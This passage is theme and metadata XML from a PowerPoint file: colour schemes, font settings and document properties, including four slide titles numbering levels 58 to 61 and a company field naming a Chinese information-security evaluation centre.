        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="003366"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="C0C0C0"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="A5A5A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="449CD8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="CFCFCF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8DC4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="19B3B3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="855ADA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="sx272TGp_report_light">
      <a:majorFont>
        <a:latin typeface="黑体"/>
        <a:ea typeface="黑体"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="黑体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x272TGp_report_light 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="003366"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="C0C0C0"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="4EA7EA"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="93C052"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="B2D0F3"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="85AE49"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="9999FF"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="855AD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x272TGp_report_light 2">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="003366"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="C0C0C0"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="DF6521"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D7D03B"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ECB8AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C3BC35"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="188FB4"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A98FD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x272TGp_report_light 3">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="003366"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="C0C0C0"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="A5A5A5"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="449CD8"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="CFCFCF"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="3D8DC4"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="19B3B3"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="855AD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461</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>28</Paragraphs>
  <Slides>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黑体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第五十八关</vt:lpstr>
      <vt:lpstr>第五十九关</vt:lpstr>
      <vt:lpstr>第六十关</vt:lpstr>
      <vt:lpstr>第六十一关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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ThemeGallery PowerTemplate</dc:title>
  <dc:creator>沈传宁</dc:creator>
  <cp:lastModifiedBy>随风</cp:lastModifiedBy>
  <cp:revision>3136</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-30T08:03:06Z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ICV">
    <vt:lpwstr>5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>